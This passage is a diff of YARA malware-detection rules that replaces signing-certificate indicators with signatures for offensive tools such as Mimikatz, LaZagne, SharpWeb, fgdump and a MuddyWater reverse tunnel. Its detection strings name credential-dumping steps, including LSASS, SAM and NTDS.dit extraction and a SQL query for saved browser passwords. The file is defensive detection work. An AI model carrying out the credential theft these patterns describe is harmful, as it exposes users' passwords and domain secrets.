-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REITSUPER ESTATE LLC" and pe.signatures [ i ] . serial == "07:cf:63:bd:cc:c1:5c:55:e5:ce:78:5b:df:be:aa:cf" )
+		uint32( 0 ) == 0x6d783f3c and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0382Cd4B6Ed21Ed7C3Eaea266269D000 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICOIUS_RTF_Encodedurl : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables calling ClearMyTracksByProcess"
 		author = "ditekSHen"
-		id = "ad4bc1bc-4d72-51bf-a22c-cd98f33f3931"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6b3f0434-24b2-5ae8-a6fc-c0fdded4996f"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2612-L2623"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L930-L941"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7e8204f2ec30da73bc2eb83e065412c96e084d7ff5f8ab6125d643693d7407d1"
+		logic_hash = "cb791bb5e2af46ff9f1f07cef33bbd51edc44b2394d6f3eff31d39eaa5ff2a33"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e600612ffcd002718b7d03a49d142d07c5a04154"
-		importance = 20
+
+	strings:
+		$s1 = "\\u-65431?\\u-65419?\\u-65419?\\u-65423?\\u-" ascii wide
+		$s2 = "\\u-65432?\\u-65420?\\u-65420?\\u-65424?\\u-" ascii wide
+		$s3 = "\\u-65433?\\u-65430?\\u-65427?\\u-65434?\\u-" ascii wide
+		$s4 = "\\u-65434?\\u-65431?\\u-65428?\\u-65435?\\u-" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LOOK AND FEEL SP Z O O" and pe.signatures [ i ] . serial == "03:82:cd:4b:6e:d2:1e:d7:c3:ea:ea:26:62:69:d0:00" )
+		uint32( 0 ) == 0x74725c7b and any of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Remotetemplate : CVE_2017_11882 FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RTF documents potentially exploiting CVE-2017-11882"
 		author = "ditekSHen"
-		id = "8883185a-8239-5648-bebc-3a4c3578a7d6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "59b31243-a360-531f-99ea-32b54d19ab52"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2625-L2636"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L943-L953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0e35f2dbd27de0dc9ea6ee7958c477e6a154bc4c8bb5484ba85ed5732502645"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		thumbprint = "1567d022b47704a1fd7ab71ff60a121d0c1df33a"
-		importance = 20
+		logic_hash = "3a75072bc4d9c7dc53220afe359911c04cd3267c142058352de80ec430a53517"
+		score = 60
+		quality = 35
+		tags = "CVE-2017-11882, FILE"
+
+	strings:
+		$s1 = "{\\*\\template http" ascii nocase
+		$s2 = "{\\*\\template file" ascii nocase
+		$s3 = "{\\*\\template \\u-" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haw Farm LIMITED" and pe.signatures [ i ] . serial == "08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" )
+		uint32( 0 ) == 0x74725c7b and 1 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Lazagne : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LaZagne post-exploitation password stealing tool. It is typically embedded with malware in the binary resources."
 		author = "ditekSHen"
-		id = "180b2e63-7151-5899-8c12-7e4cd3bb2e0d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "68bc50b0-a64f-50b6-bfbf-a26a4d0970ef"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2638-L2649"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L3-L20"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "940d257253a0a1a3f70dcec1cb57e9ab08108138ce3b80c9f74228a8b702601c"
+		logic_hash = "af4427174c1026204dc9c71878c5125efdf190328840b65fe4a69277a16fe7d2"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "23c446940a9cdc9f502b92d7928e3b3fde6d3735"
-		importance = 20
+
+	strings:
+		$s1 = "blaZagne.exe.manifest" fullword ascii
+		$S2 = "opyi-windows-manifest-filename laZagne.exe.manifest" fullword ascii
+		$s3 = "lazagne.softwares.windows." ascii
+		$s4 = "lazagne.softwares.sysadmin." ascii
+		$s5 = "lazagne.softwares.php." ascii
+		$s6 = "lazagne.softwares.memory." ascii
+		$s7 = "lazagne.softwares.databases." ascii
+		$s8 = "lazagne.softwares.browsers." ascii
+		$s9 = "lazagne.config.write_output(" fullword ascii
+		$s10 = "lazagne.config." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures [ i ] . serial == "0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4Af27Cd14F5C809Eec1F46E483F03898 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Credstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Python executable for stealing credentials including domain environments. Observed in MuddyWater."
 		author = "ditekSHen"
-		id = "e7bbc10b-54fc-5950-99fc-80a459406780"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ab587b12-f3e1-5f08-b27c-03ee9752e513"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2651-L2662"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L22-L41"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0297f156d1e4d1c20143953759000b286ac9e1f8864aa511e0e2f8fa5c3eac7f"
+		logic_hash = "e729c8b0b1db642acabbc4590833c05ce81447bb89e5f40aea5f0b8ebdee4438"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5fa9a98f003f2680718cbe3a7a3d57d7ba347ecb"
-		importance = 20
+
+	strings:
+		$s1 = "PYTHON27.DLL" fullword wide
+		$s2 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyR" fullword ascii
+		$s3 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyt" fullword ascii
+		$s4 = "subprocess.pyc" fullword ascii
+		$s5 = "MyGetProcAddress(%p, %p(%s)) -> %p" fullword ascii
+		$p1 = "Dump SAM hashes from target systemss" fullword ascii
+		$p2 = "Dump LSA secrets from target systemss" fullword ascii
+		$p3 = "Dump the NTDS.dit from target DCs using the specifed method" fullword ascii
+		$p4 = "Dump NTDS.dit password historys" fullword ascii
+		$p5 = "Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameterss" fullword ascii
+		$p6 = "Retrieve plaintext passwords and other information for accounts pushed through Group Policy Preferencess" fullword ascii
+		$p7 = "Combo file containing a list of domain\\username:password or username:password entriess" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DAhan Advertising planning" and pe.signatures [ i ] . serial == "4a:f2:7c:d1:4f:5c:80:9e:ec:1f:46:e4:83:f0:38:98" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 1 of ( $p* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_105765998695197De4109828A68A4Ee0 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_CNC_Shootback : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects Python executable for CnC communication via reverse tunnels. Used by MuddyWater group."
 		author = "ditekSHen"
-		id = "97a4bad1-9b84-54e3-a1c2-6d01bd4cde4c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "fb608115-6d9f-5640-88be-674e53b07126"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2664-L2675"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L43-L62"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c251f28eec6f93522f5a3706e1abcfd892affa2b36ed84ec277dc0d4716ff667"
+		logic_hash = "996cabd4965164cb844cee1ab1e2894fc2b4fac14d4e660c456b494c5cbd0688"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "5ddae14820d6f189e637f90b81c4fdb78b5419dc"
-		importance = 20
+
+	strings:
+		$s1 = "PYTHON27.DLL" fullword wide
+		$s2 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyR" fullword ascii
+		$s3 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyt" fullword ascii
+		$s4 = "subprocess.pyc" fullword ascii
+		$s5 = "MyGetProcAddress(%p, %p(%s)) -> %p" fullword ascii
+		$p1 = "Slaver(this pc):" ascii
+		$p2 = "Master(another public server):" ascii
+		$p3 = "Master(this pc):" ascii
+		$p4 = "running as slaver, master addr: {} target: {}R/" fullword ascii
+		$p5 = "Customer(this pc): " ascii
+		$p6 = "Customer(any internet user):" ascii
+		$p7 = "the actual traffic is:  customer <--> master(1.2.3.4) <--> slaver(this pc) <--> ssh(this pc)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cryptonic ApS" and pe.signatures [ i ] . serial == "10:57:65:99:86:95:19:7d:e4:10:98:28:a6:8a:4e:e0" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 2 of ( $p* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_53F575F7C33Ee007887F30680486Db5E : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Fgdump : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects all versions of the password dumping tool, fgdump. Observed to be used by DustSquad group."
 		author = "ditekSHen"
-		id = "8353ac89-1d98-5b05-a851-50d9e42f8f74"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2759fce2-db2a-5a48-bb37-931fd847a32d"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2677-L2688"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L64-L81"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "050d8c4dcb80cd637981c208c6d1316e9933d4f06bbf8af3717d2205a4f84f6d"
+		logic_hash = "fdccd91a84374f7c94843bd9c2191720959416acf2e33d7b28b42d63d7ea4ce3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a42d8f60663dd86265e566f33d0ed5554e4c9a50"
-		importance = 20
+
+	strings:
+		$s1 = "dumping server %s" ascii
+		$s2 = "dump on server %s" ascii
+		$s3 = "dump passwords: %s" ascii
+		$s4 = "Dumping cache" nocase ascii
+		$s5 = "SECURITY\\Cache" ascii
+		$s6 = "LSASS.EXE process" ascii
+		$s7 = " AntiVirus " nocase ascii
+		$s8 = " IPC$ " ascii
+		$s9 = "Exec failed, GetLastError returned %d" fullword ascii
+		$10 = "writable connection to %s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RET PTY. LTD." and pe.signatures [ i ] . serial == "53:f5:75:f7:c3:3e:e0:07:88:7f:30:68:04:86:db:5e" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7E89B9Df006Bd1Aa4C48D865039634Ca : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Sharpweb : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects all versions of the browser password dumping .NET tool, SharpWeb."
 		author = "ditekSHen"
-		id = "aa208da9-06e2-5bf5-8453-a545c640efa7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f85dd689-c2a9-5cea-9c19-1e66ec942606"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2690-L2701"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L83-L110"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "825e4b69aec565b6ef6b4ac2394f5a562a84615e3c91331934fa378152635df4"
+		logic_hash = "036d576eb7acdededda7b31d3dda3a4928e01ff761bf45a1112da6bf7d4e2966"
 		score = 75
-		quality = 75
+		quality = 40
 		tags = "FILE"
-		thumbprint = "63ad44acaa7cd7f8249423673fbf3c3273e7b2dc"
-		importance = 20
+
+	strings:
+		$param1 = "logins" nocase wide
+		$param2 = "cookies" nocase wide
+		$param3 = "edge" nocase wide
+		$param4 = "firefox" nocase wide
+		$param5 = "chrome" nocase wide
+		$path1 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" wide
+		$path2 = "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" wide
+		$path3 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" wide
+		$path4 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks" wide
+		$sql1 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;" nocase wide
+		$sql2 = "UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d" nocase wide
+		$sql3 = "SELECT action_url, username_value, password_value FROM logins" nocase wide
+		$func1 = "get_encryptedPassword" fullword ascii
+		$func2 = "<GetLogins>g__GetVaultElementValue0_0" fullword ascii
+		$func3 = "<encryptedPassword>k__BackingField" fullword ascii
+		$pdb = "\\SharpWeb\\obj\\Debug\\SharpWeb.pdb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dummy" and pe.signatures [ i ] . serial == "7e:89:b9:df:00:6b:d1:aa:4c:48:d8:65:03:96:34:ca" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $func* ) and 3 of ( $param* ) and ( 1 of ( $path* ) or 1 of ( $sql* ) ) ) or $pdb )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ddeb53F957337Fbeaf98C4A615B149D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Blackbone : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects Blackbone password dumping tool on Windows 7-10 operating system."
 		author = "ditekSHen"
-		id = "13347f66-c726-59be-9d0e-871512335bbd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a6d9f9d1-75fb-51af-87ad-80b4e135e759"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2703-L2714"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L112-L129"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4932dcea41879fd29250456cfef7a32a1303f599adbd4b61d91cb2e7e22cf5a2"
+		logic_hash = "e9dacd28accaef8a93ff8d3b5cf9437b3848791711a4a7118ab46d2bb6ca42d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "91cabea509662626e34326687348caf2dd3b4bba"
-		importance = 20
+
+	strings:
+		$s1 = "BlackBone: %s: " ascii
+		$s2 = "\\BlackBoneDrv\\" ascii
+		$s3 = "\\DosDevices\\BlackBone" fullword wide
+		$s4 = "\\Temp\\BBImage.manifest" wide
+		$s5 = "\\Device\\BlackBone" fullword wide
+		$s6 = "BBExecuteInNewThread" fullword ascii
+		$s7 = "BBHideVAD" fullword ascii
+		$s8 = "BBInjectDll" fullword ascii
+		$s9 = "ntoskrnl.exe" fullword ascii
+		$s10 = "WDKTestCert Ton," ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mozilla Corporation" and pe.signatures [ i ] . serial == "0d:de:b5:3f:95:73:37:fb:ea:f9:8c:4a:61:5b:14:9d" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C88Af896B6452241Fe00E3Aaec11B1F8 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Mimikatz : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Mimikatz"
 		author = "ditekSHen"
-		id = "4d73705a-e980-5aa0-a326-e35990226e37"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "feb236c0-6e0d-5c2c-a050-cf1d000aaf38"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2716-L2727"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L131-L164"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a5f290f9479189ff83bf5da3a3d086453c9230311a48f4c0bd4654024ebeef8"
+		logic_hash = "42c9c78c88bb7c427d5f0bf1d3b0113205780142b499eb17858037ded0f2971e"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "9ce1cbf5be77265af2a22e28f8930c2ac5641e12"
-		importance = 20
+
+	strings:
+		$s1 = "mimilib.dll" ascii
+		$s2 = "mimidrv.sys" ascii
+		$s3 = "mimikatz.exe" ascii
+		$s4 = "\\mimidrv.pdb" ascii
+		$s5 = "mimikatz" ascii
+		$s6 = { 6d 00 69 00 6d 00 69 00 6b 00 61 00 74 00 7a }
+		$s7 = { 5c 00 6d 00 69 00 6d 00 69 00 64 00 72 00 76 }
+		$s8 = { 6d 00 69 00 6d 00 69 00 64 00 72 00 76 }
+		$s9 = "Lecture KIWI_MSV1_0_" ascii
+		$s10 = "Search for LSASS process" ascii
+		$f1 = "SspCredentialList" ascii
+		$f2 = "KerbGlobalLogonSessionTable" ascii
+		$f3 = "LiveGlobalLogonSessionList" ascii
+		$f4 = "TSGlobalCredTable" ascii
+		$f5 = "g_MasterKeyCacheList" ascii
+		$f6 = "l_LogSessList" ascii
+		$f7 = "lsasrv!" ascii
+		$f8 = "SekurLSA" ascii
+		$f9 = /Cached(Unlock|Interative|RemoteInteractive)/ ascii
+		$dll_1 = { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }
+		$dll_2 = { c7 0? 10 02 00 00 ?? 89 4? }
+		$sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
+		$sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TeamViewer Germany GmbH" and pe.signatures [ i ] . serial == "00:c8:8a:f8:96:b6:45:22:41:fe:00:e3:aa:ec:11:b1:f8" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $* ) or 3 of ( $f* ) or all of ( $dll_* ) or any of ( $sys_* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_09E015E98E4Fabcc9Ac43E042C96090D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_SCN_Portscan : FILE
 {
 	meta:
-		description = "Detects BestEncrypt commercial disk encryption and wiping software signing certificate"
+		description = "Detects a port scanner tool observed as second or third stage post-compromise or dropped by malware."
 		author = "ditekSHen"
-		id = "577cff87-b676-598b-acea-e7c01df0ef15"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://blog.macnica.net/blog/2020/11/dtrack.html"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2729-L2742"
+		id = "f270e098-17a0-5d66-acd0-c946a29919f4"
+		date = "2024-09-25"
+		modified = "2024-09-25"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L166-L180"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77f9f50c6dd862419edaa7c3fcee0ce3f607a5b7b939d7844969082ab9777bbf"
+		logic_hash = "ebe5eb045a250ca38a55ac43018548074e9db160d76737c36f8ae5ea268b7b10"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "04e407118516053ff248503b31d6eec6daf4a809"
-		importance = 20
+
+	strings:
+		$s1 = "HEAD / HTTP/1.0" fullword ascii
+		$s2 = "Result.txt" fullword ascii
+		$s3 = "Example: %s SYN " ascii
+		$s4 = "Performing Time: %d/%d/%d %d:%d:%d -->" fullword ascii
+		$s5 = "Bind On IP: %d.%d.%d.%d" fullword ascii
+		$s6 = "SYN Scan: About To Scan %" ascii
+		$s7 = "Normal Scan: About To Scan %" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jetico Inc. Oy" and pe.signatures [ i ] . serial == "09:e0:15:e9:8e:4f:ab:cc:9a:c4:3e:04:2c:96:09:0d" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_118D813D830F218C0F46D4Fc : FILE
+rule DITEKSHEN_INDICATOR_TOOL_MEM_Mxtract : FILE
 {
 	meta:
-		description = "Detects BestEncrypt commercial disk encryption and wiping software signing certificate"
+		description = "Detects mXtract, a linux-based tool that dumps memory for offensive pentration testing and can be used to scan memory for private keys, ips, and passwords using regexes."
 		author = "ditekSHen"
-		id = "b14b14c8-202d-533d-97dc-c6336ddf75c4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e8c5e5b3-aa98-5f7f-9410-3efeef725f41"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2744-L2755"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L182-L195"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3240504794394c06f050ef3eb5ef82e0b476e2bbeabfb394fc4646e98bc6e976"
-		score = 75
-		quality = 75
+		logic_hash = "8271722c3b8f4458d20cf874d37e87e3b1fde701205ff54f0360fb87f717fc3f"
+		score = 50
+		quality = 69
 		tags = "FILE"
-		thumbprint = "bd16f70bf6c2ef330c5a4f3a27856a0d030d77fa"
-		importance = 20
+
+	strings:
+		$s1 = "_ZN18process_operations10get_rangesEv" fullword ascii
+		$s2 = "_ZN4misc10write_dumpESsSs" fullword ascii
+		$s3 = "_ZTVNSt8__detail13_Scanner_baseE" fullword ascii
+		$s4 = "Running as root is recommended as not all PIDs will be scanned" fullword ascii
+		$s5 = "ERROR ATTACHING TO PROCESS" fullword ascii
+		$s6 = "ERROR SCANNING MEMORY RANGE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shang Hai Shen Wei Wang Luo Ke Ji You Xian Gong Si" and pe.signatures [ i ] . serial == "11:8d:81:3d:83:0f:21:8c:0f:46:d4:fc" )
+		( uint32( 0 ) == 0x464c457f or uint16( 0 ) == 0x457f ) and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2304Ecf0Ea2B2736Beddd26A903Ba952 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Sniffpass : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SniffPass, a password monitoring software that listens on the network and captures passwords over POP3, IMAP4, SMTP, FTP, and HTTP."
 		author = "ditekSHen"
-		id = "3e064799-2333-5d10-8841-8d0a44ad9c1b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b96498d4-bbe3-5cb8-9c24-91ebb51e078a"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2757-L2768"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L197-L212"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c10695440ec4e39cf5b51c926ceeacc13caf3a58006c64b0168a04b4755978a6"
+		logic_hash = "9b56ee4bac39b4220b24e92d00076650ffe84b71a60c0213a84fcf21c6cfe4cf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d59a63e230cef77951cb73a8d65576f00c049f44"
-		importance = 20
+
+	strings:
+		$s1 = "\\Release\\SniffPass.pdb" ascii
+		$s2 = "Password   Sniffer" fullword wide
+		$s3 = "Software\\NirSoft\\SniffPass" fullword ascii
+		$s4 = "Sniffed PasswordsCFailed to start" wide
+		$s5 = "Pwpcap.dll" fullword ascii
+		$s6 = "nmwifi.exe" fullword ascii
+		$s7 = "NmApi.dll" fullword ascii
+		$s8 = "npptools.dll" fullword ascii
 
 	condition:
